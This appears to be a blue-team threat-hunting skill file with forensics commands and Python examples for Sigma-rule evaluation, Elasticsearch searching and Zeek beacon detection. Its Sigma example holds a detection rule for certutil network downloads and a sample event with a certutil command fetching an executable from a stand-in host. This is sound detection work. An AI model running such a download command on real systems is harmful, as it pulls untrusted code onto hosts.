threat-hunting

Purpose

This skill enables proactive detection and response to advanced cyber threats in enterprise environments using forensic tools and analytics. It focuses on identifying anomalies, investigating incidents, and mitigating risks through data-driven methods.

When to Use

Use this skill during active threat investigations, such as unusual network traffic, endpoint anomalies, or post-breach analysis. Apply it in blue-team operations like monitoring for indicators of compromise (IOCs), conducting regular hunts in large-scale networks, or integrating with SIEM systems for real-time alerts.

Key Capabilities

  • Analyze memory dumps with Volatility to detect malware processes.
  • Parse network logs using Zeek for identifying suspicious connections.
  • Query Elasticsearch for threat patterns via custom queries.
  • Generate timelines from forensic artifacts using tools like Plaso.
  • Automate threat correlation with Sigma rules for log analysis.
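
The Sigma-rule correlation item above, as an added example written for this page (not code from the Sigma project or from this skill): a small evaluator that holds a rule as the Python-dict equivalent of its YAML (to avoid a YAML dependency), implements the common field modifiers (contains, startswith, endswith, re, all) and the condition grammar (and, or, not, parentheses), and runs the rule over constructed process-creation events. The rule, the "approved" host and the events are made up for illustration; only the field names follow Sigma's Windows process_creation logsource.

```python
import re

# Constructed rule, equivalent to a Sigma YAML rule for the Windows
# process_creation logsource. Field names (Image, CommandLine) are Sigma's;
# the values, the "approved" host and the title are made up for this example.
RULE = {
    "title": "certutil download from the network (constructed)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["-urlcache", "http"],
        },
        "filter_approved": {
            "CommandLine|contains": "updates.example.internal",
        },
        "condition": "selection and not filter_approved",
    },
}


def _match_value(modifiers, actual, expected):
    # Sigma string matching is case-insensitive; 're' is the one exception.
    if "re" in modifiers:
        return re.search(str(expected), str(actual)) is not None
    a, e = str(actual).lower(), str(expected).lower()
    if "contains" in modifiers:
        return e in a
    if "startswith" in modifiers:
        return a.startswith(e)
    if "endswith" in modifiers:
        return a.endswith(e)
    return a == e


def _match_field(spec, expected, event):
    # "Field|mod1|mod2": a missing field never matches. A list of values is
    # OR-ed unless the 'all' modifier is present.
    field, *modifiers = spec.split("|")
    if field not in event:
        return False
    values = expected if isinstance(expected, list) else [expected]
    hits = [_match_value(modifiers, event[field], v) for v in values]
    return all(hits) if "all" in modifiers else any(hits)


def _match_selection(selection, event):
    # A map is AND over its fields; a list of maps is OR over the maps.
    if isinstance(selection, list):
        return any(_match_selection(s, event) for s in selection)
    return all(_match_field(k, v, event) for k, v in selection.items())


def _eval_condition(condition, named, event):
    # Recursive-descent evaluation of: ident | not X | X and Y | X or Y | (X)
    tokens = re.findall(r"\(|\)|\w+", condition)
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def expr():
        value = term()
        while peek() == "or":
            take()
            rhs = term()
            value = value or rhs
        return value

    def term():
        value = factor()
        while peek() == "and":
            take()
            rhs = factor()
            value = value and rhs
        return value

    def factor():
        tok = take()
        if tok == "not":
            return not factor()
        if tok == "(":
            value = expr()
            take()  # closing parenthesis
            return value
        return _match_selection(named[tok], event)

    return expr()


def evaluate(rule, event):
    """True if the rule's condition holds for one log event."""
    detection = rule["detection"]
    named = {k: v for k, v in detection.items() if k != "condition"}
    return _eval_condition(detection["condition"], named, event)


# Constructed process_creation events: a real download, an approved one,
# and certutil used for hashing only (should not fire).
EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.7/a.exe a.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -f https://updates.example.internal/p.cab p.cab"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -hashfile payload.bin SHA256"},
]


def hunt(rule=RULE, events=EVENTS):
    """Return the indexes of the events the rule fires on."""
    return [i for i, ev in enumerate(events) if evaluate(rule, ev)]


if __name__ == "__main__":
    print("rule fired on events:", hunt())
```

The filter selection is what keeps the rule usable in a real fleet: the approved update host is excluded inside the rule rather than by post-hoc suppression, so the exception is versioned with the detection. Matching is deliberately case-insensitive, as Sigma specifies, because Windows paths and command lines vary in case across sources.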

Usage Patterns

Start by collecting data from endpoints or networks, then apply analytics to identify threats. For example, use a pipeline: ingest logs → run queries → correlate events → respond. Always scope hunts to specific IOCs or time windows. If integrating with automation, wrap commands in scripts that handle input validation and output parsing. For multi-step hunts, chain tools like Zeek for capture and Elasticsearch for indexing.

Common Commands/API

Use these commands for threat hunting tasks. Pass credentials through environment variables rather than on the command line, e.g.
export ELASTICSEARCH_API_KEY='<base64 id:api_key>'
for API access (note the form export NAME=value; the key then stays out of the command line and process list of the tools that use it).
  • Volatility for memory forensics (Volatility 2 syntax; Volatility 3 needs no --profile and names the plugin windows.pslist):
    volatility -f memory.dump --profile=Win7SP1x64 pslist

    This lists processes; add
    --output=json --output-file=output.json
    to save results in a machine-readable form. The profile must match the image's OS build and service pack exactly; if in doubt, run the imageinfo plugin first to have one suggested.
  • Zeek for network analysis:
    zeek -r capture.pcap local

    This replays the pcap through the default local.zeek policy and writes conn.log, dns.log, ssl.log and friends into the current directory. zeek-cut reads a log on stdin and selects columns, so filter with
    zeek-cut ts id.orig_h id.resp_h id.resp_p < conn.log | grep "suspicious_ip"
    to pull out the connections that involve an address of interest.
  • Elasticsearch API for log queries:
    Use endpoint:
    POST https://es.example.com/_search
    with body:
    { "query": { "match": { "message": "malware" } } }

    and a Content-Type: application/json header. Authenticate via header:
    Authorization: ApiKey $ELASTICSEARCH_API_KEY
    Elasticsearch API keys use the ApiKey scheme (the value is the base64 of id:api_key returned when the key was created); Bearer is for service-account and token-based auth, and an API key sent as Bearer is rejected. A match query runs analysed full-text search, so for an exact indicator use a term query on a keyword field, and add a range filter on @timestamp to keep the hunt scoped.
  • Plaso for timeline generation:
    log2timeline.py --storage-file timeline.plaso /path/to/logs

    Then export a sorted timeline:
    psort.py -o l2tcsv -w output.csv timeline.plaso
    A filter expression on date can follow the storage file to restrict the output to the hunt's time window.
Config formats: Use JSON for Elasticsearch queries (e.g., above). Zeek policies themselves are .zeek scripts, not INI; the INI fragment belongs to ZeekControl's node.cfg, which is what tells zeekctl which interface to monitor, e.g.
[zeek]
type=standalone
host=localhost
interface=eth0

Integration Notes

Integrate this skill with other blue-team tools by piping outputs, e.g., Zeek logs to Elasticsearch via Logstash or Filebeat's zeek module. For API integrations, read $ELASTICSEARCH_API_KEY from the environment in scripts rather than hard-coding it. An ingest pipeline is created with PUT against a named pipeline and a JSON body (the pipeline name and processor below are illustrative):
    curl -H "Authorization: ApiKey $ELASTICSEARCH_API_KEY" -H "Content-Type: application/json" \
      -X PUT https://es.example.com/_ingest/pipeline/zeek-conn \
      -d '{"description": "tag Zeek conn events", "processors": [{"set": {"field": "event.dataset", "value": "zeek.connection"}}]}'
A bare POST to /_ingest/pipeline with no pipeline name and no body is rejected. Ensure tools share formats like JSON for data exchange. If using containers, mount forensic data read-only, e.g., docker run with
-v /host/logs:/container/logs:ro
so the analysis container cannot alter the evidence. Test integrations in a sandbox to avoid disrupting production environments.

Error Handling

Check for common errors like a mismatched profile in Volatility 2 (if
--profile
does not match the image, Volatility cannot locate the kernel structures and aborts, typically reporting that no suitable address space mapping was found; run
volatility --info
to list available profiles, or the imageinfo plugin to have one suggested). For API calls, handle 4xx/5xx responses; in Python with requests:
    import os, requests
    headers = {"Authorization": f"ApiKey {os.environ['ELASTICSEARCH_API_KEY']}",
               "Content-Type": "application/json"}
    response = requests.post(url, headers=headers, json=body, timeout=30)
    if not response.ok:  # any 4xx/5xx, including 401/403 from a bad or expired key
        raise RuntimeError(f"Elasticsearch HTTP {response.status_code}: {response.text[:200]}")
In scripts, use try/except (Python) or an explicit existence test (shell) for missing input files, e.g., test that the pcap exists before calling zeek -r and exit non-zero if it does not. Log errors to a file with timestamps for auditing.
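
The 4xx/5xx handling above and the scoped query the commands section calls for, as one added example that is not part of the page: it builds a term-plus-@timestamp-range query for an indicator, sends it with the ApiKey header, retries transient 429/502/503/504 responses with backoff, fails fast on 401/403, and logs every failure with a timestamp. Only the standard library is used, and the HTTP call is injectable so the retry and error logic can be exercised offline. The endpoint es.example.com, the index name zeek-conn and the field id.orig_h are assumptions, not something the page specifies.

```python
import json
import logging
import time
import urllib.error
import urllib.request

# Errors go to a timestamped log; in production attach a logging.FileHandler
# so failed hunts are auditable, as the page recommends.
logging.basicConfig(level=logging.ERROR,
                    format="%(asctime)s %(levelname)s %(message)s")
log = logging.getLogger("hunt.es")

# Assumptions for this example: an Elasticsearch endpoint es.example.com,
# an index zeek-conn holding Zeek conn events, and Zeek's own field names.
ES_URL = "https://es.example.com"
INDEX = "zeek-conn"


class HuntApiError(RuntimeError):
    """Non-retryable API failure (bad key, bad query, hard server error)."""


def build_ioc_query(field, value, start, end, size=100):
    """Exact IOC match plus a time window, in filter context (no scoring)."""
    return {
        "size": size,
        "query": {"bool": {"filter": [
            {"term": {field: value}},  # keyword field: exact match, no analysis
            {"range": {"@timestamp": {"gte": start, "lt": end}}},
        ]}},
        "sort": [{"@timestamp": "asc"}],
    }


def urllib_post(url, headers, body):
    """Default transport: returns (status, text) and never raises on 4xx/5xx."""
    req = urllib.request.Request(url, data=json.dumps(body).encode(),
                                 headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def search(api_key, body, es_url=ES_URL, index=INDEX, post=urllib_post,
           retries=3, backoff=1.0):
    """POST a search; retry transient statuses, fail fast on auth errors."""
    url = f"{es_url.rstrip('/')}/{index}/_search"
    headers = {"Authorization": f"ApiKey {api_key}",  # ApiKey scheme, not Bearer
               "Content-Type": "application/json"}
    for attempt in range(1, retries + 1):
        status, text = post(url, headers, body)
        if status == 200:
            return json.loads(text)
        if status in (401, 403):
            # Retrying a bad key only spams the audit log on the cluster.
            log.error("auth failure HTTP %s at %s", status, url)
            raise HuntApiError(f"authentication/authorization failed ({status})")
        if status in (429, 502, 503, 504) and attempt < retries:
            log.error("transient HTTP %s on attempt %d, retrying", status, attempt)
            time.sleep(backoff * attempt)
            continue
        # Bad query (400), missing index (404), exhausted retries, etc.
        log.error("search failed HTTP %s: %s", status, text[:200])
        raise HuntApiError(f"search failed with HTTP {status}: {text[:200]}")


def hit_sources(result):
    """Unwrap the _source documents from a search response."""
    return [h["_source"] for h in result.get("hits", {}).get("hits", [])]


if __name__ == "__main__":
    import os
    key = os.environ["ELASTICSEARCH_API_KEY"]  # fail fast if unset
    query = build_ioc_query("id.orig_h", "192.168.1.100", "now-24h", "now")
    for doc in hit_sources(search(key, query)):
        print(doc)
```

Transient statuses get a linear backoff and a bounded number of attempts; 401/403 are never retried, because a key that was revoked or lacks the index privilege will not start working on the third try, and the repeated failures would only pollute the cluster's audit trail.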

Concrete Usage Examples

  1. Detect malware in a memory dump:
    First, make the tool reachable, e.g.
    export VOLATILITY_PATH=/path/to/volatility
    (the form is export NAME=value, not export $NAME=value). Run:
    volatility -f suspect.dump --profile=<LinuxProfile> linux_pslist | grep "suspicious_process"
    Linux plugins in Volatility 2 carry the linux_ prefix, and a Linux profile has to be built for the exact kernel of the captured host (there is no stock Linux x64 profile); Volatility 3 uses linux.pslist with a matching symbol table instead. If matches are found, alert via script:
    echo "$(date -u +%FT%TZ) Threat detected: suspicious_process in suspect.dump" >> alert.log
    .
  2. Hunt for network anomalies:
    Capture traffic with Zeek (logs are written to the current directory; -C ignores bad TCP checksums, which offloading NICs produce routinely):
    zeek -i eth0 -C
    . Then query, remembering that zeek-cut reads the log on stdin and that awk column numbers refer to the fields you selected:
    zeek-cut ts id.orig_h id.resp_h id.resp_p < conn.log | awk '$2 == "192.168.1.100"'
    . Integrate with Elasticsearch (a term query on Zeek's own field name; adjust to source.ip if the ingest pipeline maps to ECS):
    curl -H "Authorization: ApiKey $ELASTICSEARCH_API_KEY" -H "Content-Type: application/json" -d '{"query":{"term":{"id.orig_h":"192.168.1.100"}}}' https://es.example.com/_search
    .
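
The pipeline from Usage Patterns (ingest logs → run queries → correlate events → respond) and the network-anomaly hunt in example 2, as one added example that is not part of the page: it parses a Zeek conn.log by its #fields/#types header rows, scopes the records to a time window, matches an IOC list against both endpoints, and correlates repeated connections at near-constant intervals as beaconing candidates, emitting the alert lines a response step would append to alert.log or push to the SIEM. The conn.log, its UIDs, the addresses (documentation ranges) and the indicator are constructed; the sample carries only a subset of Zeek's columns, but because the parser is driven by the header a full conn.log parses the same way.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed conn.log (documentation address ranges, made-up UIDs) with a
# subset of Zeek's columns; the parser is driven by #fields/#types, so a
# full conn.log parses the same way.
SAMPLE_CONN_LOG = "\n".join([
    "#separator \\x09",
    "#set_separator\t,",
    "#empty_field\t(empty)",
    "#unset_field\t-",
    "#path\tconn",
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes\tconn_state",
    "#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tstring\tinterval\tcount\tcount\tstring",
    "1714521600.000000\tC1\t10.0.0.5\t51000\t203.0.113.7\t443\ttcp\tssl\t0.52\t512\t1024\tSF",
    "1714521605.100000\tC2\t10.0.0.8\t40100\t10.0.0.2\t53\tudp\tdns\t0.01\t60\t120\tSF",
    "1714521660.000000\tC3\t10.0.0.5\t51002\t203.0.113.7\t443\ttcp\tssl\t0.48\t512\t1024\tSF",
    "1714521700.000000\tC4\t10.0.0.12\t52010\t198.51.100.23\t8080\ttcp\t-\t3.20\t2048\t-\tS1",
    "1714521721.000000\tC5\t10.0.0.5\t51004\t203.0.113.7\t443\ttcp\tssl\t0.51\t512\t1024\tSF",
    "1714521780.000000\tC6\t10.0.0.5\t51006\t203.0.113.7\t443\ttcp\tssl\t0.50\t512\t1024\tSF",
    "1714521841.000000\tC7\t10.0.0.5\t51008\t203.0.113.7\t443\ttcp\tssl\t0.49\t512\t1024\tSF",
    "1714522000.000000\tC8\t10.0.0.8\t40102\t198.51.100.23\t443\ttcp\tssl\t1.00\t900\t3000\tSF",
    "#close\t2024-05-01-00-10-00",
])

IOCS = {"198.51.100.23"}                 # constructed indicator list
WINDOW = (1714521600.0, 1714521900.0)    # [start, end) of the hunt, epoch seconds

# Zeek #types -> Python converters; anything else stays a string.
_CONVERT = {"time": float, "interval": float, "port": int, "count": int}


def parse_conn_log(text):
    """Parse Zeek's TSV format using its #fields and #types header rows."""
    fields, types, records = [], [], []
    for line in text.splitlines():
        if line.startswith("#fields\t"):
            fields = line.split("\t")[1:]
        elif line.startswith("#types\t"):
            types = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue                      # other header lines, #close, blanks
        else:
            rec = {}
            for name, typ, raw in zip(fields, types, line.split("\t")):
                rec[name] = None if raw in ("-", "(empty)") else _CONVERT.get(typ, str)(raw)
            records.append(rec)
    return records


def scope(records, start, end):
    """Keep only records whose ts falls in [start, end)."""
    return [r for r in records if start <= r["ts"] < end]


def ioc_hits(records, iocs):
    """UIDs of connections where either endpoint is a known indicator."""
    return [r["uid"] for r in records if r["id.resp_h"] in iocs or r["id.orig_h"] in iocs]


def beacon_candidates(records, min_conns=4, max_cv=0.2):
    """Flows with many connections at near-constant intervals.

    Groups by (orig_h, resp_h, resp_p); a low coefficient of variation of
    the inter-arrival times (stdev / mean) is the classic beaconing signal.
    """
    flows = defaultdict(list)
    for r in records:
        flows[(r["id.orig_h"], r["id.resp_h"], r["id.resp_p"])].append(r["ts"])
    out = []
    for (orig_h, resp_h, resp_p), times in flows.items():
        if len(times) < min_conns:
            continue
        times.sort()
        deltas = [b - a for a, b in zip(times, times[1:])]
        m = mean(deltas)
        if m > 0 and pstdev(deltas) / m <= max_cv:
            out.append({"orig_h": orig_h, "resp_h": resp_h, "resp_p": resp_p,
                        "conns": len(times), "interval": round(m)})
    return out


def run_hunt(text=SAMPLE_CONN_LOG, iocs=IOCS, window=WINDOW):
    """ingest -> scope -> query (IOC) -> correlate (beacons) -> alert lines."""
    in_scope = scope(parse_conn_log(text), *window)
    findings = {"ioc_hits": ioc_hits(in_scope, iocs),
                "beacons": beacon_candidates(in_scope)}
    findings["alerts"] = (
        [f"IOC hit: conn uid={uid}" for uid in findings["ioc_hits"]] +
        [f"beacon candidate: {b['orig_h']} -> {b['resp_h']}:{b['resp_p']} "
         f"{b['conns']} conns every ~{b['interval']}s" for b in findings["beacons"]]
    )
    return findings


if __name__ == "__main__":
    # Response step: these are the lines to append to alert.log or send on.
    for line in run_hunt()["alerts"]:
        print(line)
```

Note that the last record (C8) also touches the indicator but sits outside the window, so it is dropped by the scoping step; that is the point of the page's advice to scope every hunt, since an unscoped IOC sweep over months of conn.log produces hits nobody can triage. The beacon check is intentionally simple (count plus interval regularity); real sessions add jitter, so tune min_conns and max_cv against the environment's baseline before acting on candidates.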

Graph Relationships

  • Related to: blue-team (cluster), as it shares tools for defensive operations.
  • Connected via tags: threat-hunting (direct match), cybersecurity (overlaps with detection skills), blue-team (cluster linkage).
  • Links to: Other blue-team skills like "incident-response" for follow-up actions, and "forensics-analysis" for deeper data examination.